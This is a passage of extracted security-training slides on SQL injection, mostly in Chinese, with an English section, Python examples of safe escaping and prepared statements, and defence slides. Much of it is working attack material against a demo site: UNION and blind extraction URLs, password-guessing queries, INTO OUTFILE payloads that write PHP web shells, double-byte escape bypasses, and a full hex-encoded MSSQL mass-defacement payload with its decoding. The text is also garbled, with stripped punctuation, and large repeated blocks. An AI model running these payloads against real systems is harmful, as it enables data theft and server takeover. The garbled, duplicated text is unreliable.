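    return b"".join(SPECIALS.get(b, bytes([b])) for b in data)


def escape_charset_aware(data: bytes, charset: str) -> Optional[bytes]:
    """Escape per character of the connection charset (what a charset-aware
    escaper does). Input that is not a valid byte sequence in that charset
    is rejected (None) instead of being handed to the server to reinterpret."""
    try:
        text = data.decode(charset)          # strict: invalid sequence -> None
    except UnicodeDecodeError:
        return None
    escaped = "".join(
        SPECIALS[ord(ch)].decode("ascii") if ord(ch) in SPECIALS else ch
        for ch in text
    )
    return escaped.encode(charset)


def unescaped_quote_survives(escaped: bytes, charset: str) -> bool:
    """Read the escaped bytes as the MySQL parser does, i.e. as characters
    of the connection charset, and report whether a single quote remains
    that is not preceded by a backslash. If so the literal can be closed
    early and whatever follows is parsed as SQL."""
    text = escaped.decode(charset, errors="replace")
    i = 0
    while i < len(text):
        if text[i] == "\\":
            i += 2                           # backslash consumes the next char
            continue
        if text[i] == "'":
            return True
        i += 1
    return False


def is_escaper_safe(escaper: Callable[[bytes], Optional[bytes]], charset: str) -> bool:
    """Probe an escaping routine with every lead byte followed by a quote
    (the pattern behind the BF/CC/D5 attack bytes on the slides) and report
    whether any probe leaves an unescaped quote once decoded as charset."""
    for lead in range(0x81, 0xFF):
        out = escaper(bytes([lead, 0x27]))
        if out is not None and unescaped_quote_survives(out, charset):
            return False
    return True
```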
SQL Column Truncation – introduction (1/3)
• MySQL SQL mode
  – STRICT_ALL_TABLES not enabled
    • inserting a value longer than the column produces a warning
    • but the row is still inserted
  – STRICT_ALL_TABLES enabled
    • inserting a value longer than the column produces a message
    • ERROR 1406 is raised and the row is not inserted
• Incident
  – 2008-09-07
    • WordPress 2.6.1 SQL Column Truncation Vulnerability
SQL Column Truncation - effect (2/3)
SQL Column Truncation - defences (3/3)
• Actively strip whitespace from strings that should never contain it
  – e.g. account names
• Add the BINARY keyword when SELECTing the data
• Configure MySQL to compare as BINARY by default
• Enable STRICT_ALL_TABLES in MySQL
  – values longer than the column raise an ERROR instead of a WARNING
  – to avoid those errors on insert, extra checks may be needed in the insert and update code
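The truncation effect and the defences above, as an added example that is not from the original slides: a small model of a registration flow (check for an existing name with the full value, then INSERT) into an assumed VARCHAR(16) column, with PAD SPACE versus BINARY comparison, strict mode, and the application-side whitespace and length check. The column length, the data and the function names are constructed for this example.

```python
import re

USERNAME_LEN = 16   # assumed VARCHAR(16) username column (constructed)


def mysql_store(value: str, strict: bool) -> str:
    """Model of storing into VARCHAR(n): with STRICT_ALL_TABLES off the value
    is silently cut to n characters and only a warning is raised; with it on,
    an over-length value fails with ERROR 1406 and nothing is stored."""
    if len(value) > USERNAME_LEN:
        if strict:
            raise ValueError("ERROR 1406 (22001): Data too long for column")
        return value[:USERNAME_LEN]
    return value


def pad_space_equal(a: str, b: str) -> bool:
    """Default (PAD SPACE) collation comparison: trailing spaces are ignored."""
    return a.rstrip(" ") == b.rstrip(" ")


def binary_equal(a: str, b: str) -> bool:
    """Comparison with the BINARY keyword: every byte counts."""
    return a == b


class UserTable:
    """Minimal model of a registration flow: the application checks for an
    existing name using the full, untruncated value, then inserts."""

    def __init__(self, strict: bool):
        self.strict = strict
        self.rows = []

    def register(self, username: str) -> str:
        if any(pad_space_equal(row, username) for row in self.rows):
            raise ValueError("username already taken")
        stored = mysql_store(username, self.strict)   # truncation happens here
        self.rows.append(stored)
        return stored

    def lookup(self, username: str, binary: bool = False) -> list:
        eq = binary_equal if binary else pad_space_equal
        return [row for row in self.rows if eq(row, username)]


def validate_account_name(name: str, max_len: int = USERNAME_LEN) -> str:
    """Application-side check from the defence slide: account-type fields get
    no whitespace at all and are rejected, not truncated, when too long."""
    if len(name) > max_len:
        raise ValueError("name longer than column")
    if re.search(r"\s", name):
        raise ValueError("whitespace not allowed in account names")
    return name


def raises_value_error(fn, *args) -> bool:
    """True if calling fn(*args) is rejected with ValueError."""
    try:
        fn(*args)
    except ValueError:
        return True
    return False
```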
SQL Injection – further thoughts
• Can INSERT and UPDATE statements be attacked too?
• NoSQL has no SQL injection?
• Other ways to exploit
  – Deep Blind Injection
  – Error-Based Injection
    • duplicate-entry errors
    • functions
  – information_schema
  – User-Defined Functions
  – Triggers
SQL Injection – automated tools
• Havij
• Pangolin
• w3af
• Jsky
• SQLmap
• …
Defending against SQL Injection properly
• Principle of least privilege
• Use prepared statements
• Use stored procedures
• Use UTF-8; avoid BIG5 and GBK
• Check data types and cast explicitly
  – bool settype(mixed &$var, string $type)
  – intval, doubleval
• Use safe encoding functions
  – OWASP ESAPI
    • MySQLCodec
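An added example (not the slides' own code) of the prepared-statement and type-check defences applied to the two queries used throughout this deck, each vulnerable form beside its hardened form; sqlite3 stands in for MySQL here, and the table contents and function names are constructed.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the slides' `member` table (constructed rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE member (id INTEGER, name TEXT, password TEXT, email TEXT)")
    conn.executemany("INSERT INTO member VALUES (?, ?, ?, ?)",
                     [(1, "taien", "s3cr3tpw", "taien@example.invalid"),
                      (2, "hiiir", "another1", "hiiir@example.invalid")])
    return conn


def get_user_unsafe(conn, user_id: str) -> list:
    # The slide's SELECT * FROM `member` WHERE `id` = $id: value pasted into SQL
    return conn.execute(f"SELECT * FROM member WHERE id = {user_id}").fetchall()


def get_user_safe(conn, user_id: str) -> list:
    """Type check first (the slide's intval/settype step), then a bound
    parameter, so the value is never parsed as SQL."""
    try:
        uid = int(user_id)
    except (TypeError, ValueError):
        return []                       # reject instead of trying to sanitise
    return conn.execute("SELECT * FROM member WHERE id = ?", (uid,)).fetchall()


def search_user_unsafe(conn, name: str) -> list:
    # The slide's `name` like '%$name%': a quote in $name closes the literal
    return conn.execute(f"SELECT * FROM member WHERE name LIKE '%{name}%'").fetchall()


def search_user_safe(conn, name: str) -> list:
    """The wildcard pattern is built in the application and bound as a
    parameter; quotes inside `name` are plain data."""
    return conn.execute("SELECT * FROM member WHERE name LIKE ?",
                        (f"%{name}%",)).fetchall()
```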
MSSQL real-world case - 116jurist.ru automated injection (1/4)
• 2012/12/xx 10:03:31
• Serno=51+declare+@s+varchar(8000)+set+@s=cast(0x…+as+varchar(8000))+exec(@s)--
MSSQL real-world case - 116jurist.ru automated injection (2/4)
• 2012/12/xx 10:03:33
• Serno=51+declare+@s+varchar(8000)+set+@s=cast(0x…+as+varchar(8000))+exec(@s)--
MSSQL real-world case - 116jurist.ru automated injection (3/4)
• 2012/12/xx 10:03:44
• Serno=51+declare+@s+varchar(8000)+set+@s=cast(0x…+as+varchar(8000))+exec(@s)--
MSSQL real-world case - 116jurist.ru automated injection, decoded (4/4)
• set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
  c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE
  in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>10 and t.table_name=c.table_name and
  t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
  BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=SUBSTRING(['+@C+'], 1, CHARINDEX(''</title><'',['+@C+']) - 1) where ['+@C+']
  like ''%</title><%'' ') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

• set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
  c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE
  in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>20 and t.table_name=c.table_name and
  t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
  BEGIN EXEC('ALTER TABLE ['+@T+'] ALTER COLUMN ['+@C+'] varchar(8000) NOT NULL') FETCH NEXT FROM Table_Cursor INTO
  @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

• set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
  c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE
  in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>80 and t.table_name=c.table_name and
  t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
  BEGIN EXEC('UPDATE ['+@T+'] SET
  ['+@C+']=CONVERT(VARCHAR(8000),['+@C+'])+''</title><style>.a4tw{position:absolute;clip:rect(457px,auto,auto,457px);}</style><div class=a4tw><a href=http://116jurist.ru >юридические-услуги-москва</a></div>'' ') FETCH NEXT FROM
  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
SQL Injection攻擊技巧 - 相關系統函數
函數 功能
LOAD_FILE(file_name) 讀取檔案
INTO OUTFILE varwwwhtmlbackphp 輸出檔案
VERSION() 返回MySQL伺服器版本
DATABASE() 目前使用資料庫名稱
USER() 返回目前MySQL用戶與主機名稱
SYSTEM_USER() 與USER()同義
SESSION_USER() 與USER()同義
SCHEMA() 與DATABASE()同義
CURRENT_USER() 返回當前被驗證的用戶名與主機名組合可能與USER()值有所不同
DATADIR 讀取資料庫路徑
BASEDIR 資料庫安裝路徑
hellip
SQL Injection攻擊技巧 ndash 讀檔注意事項
bull 欲讀取文件必須在伺服器上
bull 必須指定文件完整的路徑
bull 必須有權限讀取並且文件必須完全可讀
bull 欲讀取文件必須小於 max_allowed_packet
SQL Injection攻擊技巧 ndash UNION
bull PHP+MySQL未支援多指令查詢利用聯集查詢UNION
ndash 有弱點的SQL語法沒有引號的參數(以PHP為例)
bull SELECT FROM `member` WHERE `id` =$id
ndash 沒有引號攻擊範例
bull httpwwwhackdemocomgetUserphpid=1+and+1=2+UNI
ON+SELECT+1234
ndash 實際執行語法
bull SELECT FROM `member` WHERE `id` =1 AND 1=2
UNION SELECT 1234
SQL Injection攻擊技巧 ndash UNION
bull PHP+MySQL未支援多指令查詢利用聯集查詢UNION
bull 有弱點的SQL語法有引號的參數(以PHP為例)
bull SELECT FROM `member` WHERE `name` like $name
bull 沒有引號攻擊範例
bull httpwwwhackdemocomsearchUserphpname=ha
nd1=2unionselect123user()23
bull 實際執行語法
bull SELECT FROM `member` WHERE `name` like
hand1=2unionselect123user()
SQL Injection攻擊技巧 - 成功控制語法
SQL Injection攻擊技巧 ndash 猜解資料
bull 取得長度
ndash httpwwwhackdemocomgetUserphpid=1+AND+LENGTH(PA
SSWORD)=1
ndash hellip
ndash httpwwwhackdemocomgetUserphpid=1+AND+LENGTH(PA
SSWORD)=7
bull 猜解資料
ndash httpwwwhackdemocomgetUserphpid=1+AND+RIGHT(PAS
SWORD1)=a
ndash hellip
ndash httpwwwhackdemocomgetUserphpid=1+AND+RIGHT(PAS
SWORD1)=w
SQL Injection攻擊技巧 ndash 讀寫檔案
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserphpid=1+into+outfile+DW
ebsitewwwhackdemocommembertxt
bull 寫後門
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+223Cphp+system($_GET[cmd])3E22234+i
nto+outfile+DWebsitewwwhackdemocomcmdphp
加上跳脫與關閉錯誤訊息這樣安全了嗎
SQL Blind Injection
bull SQL盲注入(SQL Blind Injection)也是一種SQL Injection的類型一般
SQL Injection仰賴出錯的相關訊息建構攻擊語法而盲注入完全仰賴語法
執行的對(true)錯(false)
bull SQL Blind Injection
ndash 一般盲注入
ndash Time-Based Blind SQL Injection
Time-Based Blind SQL Injection (12)
bull 透過時間的延遲來判斷該SQL語法是否執行成功
bull 技巧
ndash 內建函數
bull BENCHMARK(COUNT EXPR)
bull SLEEP(seconds)
ndash MySQL gt= 5
ndash 創建較花時間的語法(heavy queries)
Time-Based Blind SQL Injection - 使用heavy queries (22)
Time-Based Blind SQL Injection - 透過時間延遲猜解資料庫名稱
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(1)BENCHMARK(5000000E
NCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABAS
E()+as+db)+AS+tb
bull hellip
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(104)BENCHMARK(5000000
ENCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABA
SE()+as+db)+AS+tb
SQL Injection攻擊技巧 - 繞過跳脫字元
bull ACSII編碼
ndash ASCII() CHAR()
ndash 單一
bull CHAR(68)
ndash 多個
bull CHAR(68 58 92)
bull 16進位編碼
ndash HEX()
ndash 0x443A5C
bull 雙位元組跳脫技巧
SQL Injection攻擊技巧 - 猜解資料(繞過跳脫)
bull 猜解欄位
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+user--
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+member--
bull 猜解欄位資料
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(0)
ndash hellip
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(119)
SQL Injection攻擊技巧 - 讀取資料(繞過跳脫)
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(char(6858928710198
11510511610192119119119461049799107100101
1091114699111109921031011168511510111446
112104112))--
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(0x443A5C576562736974
655C7777772E6861636B64656D6F2E636F6D5C636F6E6669
672E706870)--
SQL Injection攻擊技巧 ndash 寫檔案(無法繞過引號限制)
1 找到phpMyAdmin
2 遠端MySQL
mysqlgt use xssdb
mysqlgt set
a=0x73656C656374203078334333463730363837303230343036353736363136433238323
435463530344635333534354232373633364436343237354432393342334633452066726F6D
20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70
687027
mysqlgt prepare cmd from a
mysqlgt execute cmd
a為
select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from
xss limit 1 into outfile Cshellphp
寫入檔案為
ltphp eval($_POST[cmd])gt
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(13)
bull 透過注入的編碼與反斜線(5c)重組產生字繞過跳脫字元的限制
bull 情境
ndash 跳脫字元處理
bull addslashes
bull mysql_escape_string
bull phpin
ndash magic_quotes_gpc 開啟
ndash 採用BIG5或GBK編碼
bull set names gbk set names big5
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(23)
bull 中文語系文字以兩個位元組表示
ndash Big5
bull 高位元組 0x81-0xFE低位元組 0x40-0x7E0xA1-0xFE
ndash GBK
bull 前位元組 0x81-0xFE後位元組 0x40-0x7E
ndash GB2312
bull 前位元組 0xB0-0xF7後位元組 0xA0-0xFE
ndash 攻擊字元 BF CC D5hellip
SQL Injection攻擊技巧 -雙位元組跳脫技巧 (33)
bull 有引號的參數繞過跳脫
ndash httpwwwhackdemocomsearchUserLashphpname=h
B5+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
CC+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
d5+AND+1=2+UNION+SELECT+123423
SQL Column Truncation ndash 簡介(13)
bull MySQL中 SQL mode
ndash 沒有開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現警告提示
bull 但資料還是會新增
ndash 開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現提示
bull 出現ERROR 1406 該資料不會成功新增
bull 慘案
ndash 2008-09-07
bull WordPress 261 SQL Column Truncation Vulnerability
SQL Column Truncation - 效果(23)
SQL Column Truncation - 防禦方案(33)
bull 在字串中不該有空白的主動清除
ndash 如帳號類資訊
bull 在 SELECT 資料時加上 BINARY 參數
bull 在 MySQL 設定預設以 BINARY 查詢
bull 在 MySQL 開啟 STRICT_ALL_TABLES
ndash 超過欄位長度會出現 ERROR 而非出現 WARNING
ndash 新增資料為避免發生錯誤 可能需在新增修改加入額外檢查
SQL Injection ndash 延伸思考
bull INSERT 與 UPDATE 的攻擊可能發生嗎
bull NoSQL 沒有 SQL Injection
bull 其他攻擊利用
ndash Deep Blind Injection
ndash Error-Based Injection
bull Duplicate Error
bull Function
ndash information_schema
ndash 使用者自訂函數(User-Defined Functions)
ndash 觸發(Trigger)
SQL Injection ndash 自動化工具
bull Havij
bull Pangolin
bull w3af
bull Jsky
bull SQLmap
bull hellip
正確地防禦SQL Injection
bull 最低權限原則
bull 使用預先編譯敘述
bull 使用預存函數
bull 使用UTF8避免使用BIG5或GBK
bull 檢查資料型態與強制轉型
ndash bool settype(mixed amp$var string $type)
ndash intval doubleval
bull 使用安全函數
ndash OWASP ESAPI
bull MySQLCodec
MSSQL實際案例 - 116juristru自動化注入(14)
bull 201212xx 100331
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(24)
bull 201212xx 100333
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(34)
bull 201212xx 100344
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入解碼(44)
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]
like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO
TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET
[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt
stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM
Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
參考資料
bull 吳翰清 網路竟然這麼危險(白帽子讲Web安全) 2012
bull MySQL String Functions 51
bull MySQL Miscellaneous Functions 51
bull MySQLPHP 对单引号转义时load_fileoutfile 生成一句话
bull Shazin Sadakath Time Based SQL Injection using heavy queries in
MySQL
bull Stefan Esser MySQL and SQL Column Truncation Vulnerabilities 2008
SQL Injection攻擊技巧 ndash 讀檔注意事項
bull 欲讀取文件必須在伺服器上
bull 必須指定文件完整的路徑
bull 必須有權限讀取並且文件必須完全可讀
bull 欲讀取文件必須小於 max_allowed_packet
SQL Injection攻擊技巧 ndash UNION
bull PHP+MySQL未支援多指令查詢利用聯集查詢UNION
ndash 有弱點的SQL語法沒有引號的參數(以PHP為例)
bull SELECT FROM `member` WHERE `id` =$id
ndash 沒有引號攻擊範例
bull httpwwwhackdemocomgetUserphpid=1+and+1=2+UNI
ON+SELECT+1234
ndash 實際執行語法
bull SELECT FROM `member` WHERE `id` =1 AND 1=2
UNION SELECT 1234
SQL Injection攻擊技巧 ndash UNION
bull PHP+MySQL未支援多指令查詢利用聯集查詢UNION
bull 有弱點的SQL語法有引號的參數(以PHP為例)
bull SELECT FROM `member` WHERE `name` like $name
bull 沒有引號攻擊範例
bull httpwwwhackdemocomsearchUserphpname=ha
nd1=2unionselect123user()23
bull 實際執行語法
bull SELECT FROM `member` WHERE `name` like
hand1=2unionselect123user()
SQL Injection攻擊技巧 - 成功控制語法
SQL Injection攻擊技巧 ndash 猜解資料
bull 取得長度
ndash httpwwwhackdemocomgetUserphpid=1+AND+LENGTH(PA
SSWORD)=1
ndash hellip
ndash httpwwwhackdemocomgetUserphpid=1+AND+LENGTH(PA
SSWORD)=7
bull 猜解資料
ndash httpwwwhackdemocomgetUserphpid=1+AND+RIGHT(PAS
SWORD1)=a
ndash hellip
ndash httpwwwhackdemocomgetUserphpid=1+AND+RIGHT(PAS
SWORD1)=w
SQL Injection攻擊技巧 ndash 讀寫檔案
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserphpid=1+into+outfile+DW
ebsitewwwhackdemocommembertxt
bull 寫後門
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+223Cphp+system($_GET[cmd])3E22234+i
nto+outfile+DWebsitewwwhackdemocomcmdphp
加上跳脫與關閉錯誤訊息這樣安全了嗎
SQL Blind Injection
bull SQL盲注入(SQL Blind Injection)也是一種SQL Injection的類型一般
SQL Injection仰賴出錯的相關訊息建構攻擊語法而盲注入完全仰賴語法
執行的對(true)錯(false)
bull SQL Blind Injection
ndash 一般盲注入
ndash Time-Based Blind SQL Injection
Time-Based Blind SQL Injection (12)
bull 透過時間的延遲來判斷該SQL語法是否執行成功
bull 技巧
ndash 內建函數
bull BENCHMARK(COUNT EXPR)
bull SLEEP(seconds)
ndash MySQL gt= 5
ndash 創建較花時間的語法(heavy queries)
Time-Based Blind SQL Injection - 使用heavy queries (22)
Time-Based Blind SQL Injection - 透過時間延遲猜解資料庫名稱
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(1)BENCHMARK(5000000E
NCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABAS
E()+as+db)+AS+tb
bull hellip
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(104)BENCHMARK(5000000
ENCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABA
SE()+as+db)+AS+tb
SQL Injection攻擊技巧 - 繞過跳脫字元
bull ACSII編碼
ndash ASCII() CHAR()
ndash 單一
bull CHAR(68)
ndash 多個
bull CHAR(68 58 92)
bull 16進位編碼
ndash HEX()
ndash 0x443A5C
bull 雙位元組跳脫技巧
SQL Injection攻擊技巧 - 猜解資料(繞過跳脫)
bull 猜解欄位
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+user--
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+member--
bull 猜解欄位資料
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(0)
ndash hellip
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(119)
SQL Injection攻擊技巧 - 讀取資料(繞過跳脫)
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(char(6858928710198
11510511610192119119119461049799107100101
1091114699111109921031011168511510111446
112104112))--
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(0x443A5C576562736974
655C7777772E6861636B64656D6F2E636F6D5C636F6E6669
672E706870)--
SQL Injection攻擊技巧 ndash 寫檔案(無法繞過引號限制)
1 找到phpMyAdmin
2 遠端MySQL
mysqlgt use xssdb
mysqlgt set
a=0x73656C656374203078334333463730363837303230343036353736363136433238323
435463530344635333534354232373633364436343237354432393342334633452066726F6D
20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70
687027
mysqlgt prepare cmd from a
mysqlgt execute cmd
a為
select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from
xss limit 1 into outfile Cshellphp
寫入檔案為
ltphp eval($_POST[cmd])gt
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(13)
bull 透過注入的編碼與反斜線(5c)重組產生字繞過跳脫字元的限制
bull 情境
ndash 跳脫字元處理
bull addslashes
bull mysql_escape_string
bull phpin
ndash magic_quotes_gpc 開啟
ndash 採用BIG5或GBK編碼
bull set names gbk set names big5
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(23)
